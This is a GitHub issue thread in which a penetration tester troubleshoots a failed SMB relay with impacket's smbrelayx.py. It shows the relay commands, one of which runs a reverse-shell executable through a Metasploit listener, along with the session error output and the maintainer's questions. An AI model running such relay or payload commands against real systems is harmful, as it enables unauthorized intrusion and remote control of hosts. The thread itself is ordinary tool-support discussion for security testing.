### ISSUE TITLE
0x73,SMB SessionError: STATUS_UNSUCCESSFUL

### ISSUE THREAD

**Issue by tacticthreat** [SecureAuthCorp/impacket#705]
I have an attacker machine (kali) relaying against a target with smb signing disabled or not enforced. From a separate server I initiate an SMB connection to my attacker machine. Here are the details:

Attacker Machine:
`smbrelayx.py -h TargetIP -c "ipconfig"`
OR also tried
`smbrelayx.py -h TargetIP -e smbrev.exe`  (where the payload is also configured with a MSF listener)

After initiating a connection to my attacker machine from a server,
[*] SMBD: Received connection from **ServerIP**, attacking target **TargetIP**
[-] SessionSetup Error!
[-] processRequest (0x73,SMB SessionError: STATUS_UNSUCCESSFUL({Operation Failed} The requested operation was unsuccessful.))

In the connecting Server to the Attacker host I receive the error:
"The specified network name is no longer available"

What is the issue?

**Comment by asolino** [comment]
Can't tell much from your report. Do you have a pcap file available?

**Comment by tacticthreat** [comment]
@asolino I do but cannot provide it as it is an active engagement. Any other way I can help you understand this scenario that causes this to error out? The TargetIP is on a different but reachable subnet from my attacker machine, was wondering if that had anything to do with it. The connecting server to my attacker machine via smb I tried it on both same subnet as my attacker box as well as different subnet.

**Comment by asolino** [comment]
What impacket version are you running? Include the banner output when you run `ntlmrelayx.py`

**Comment by tacticthreat** [comment]
@asolino Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
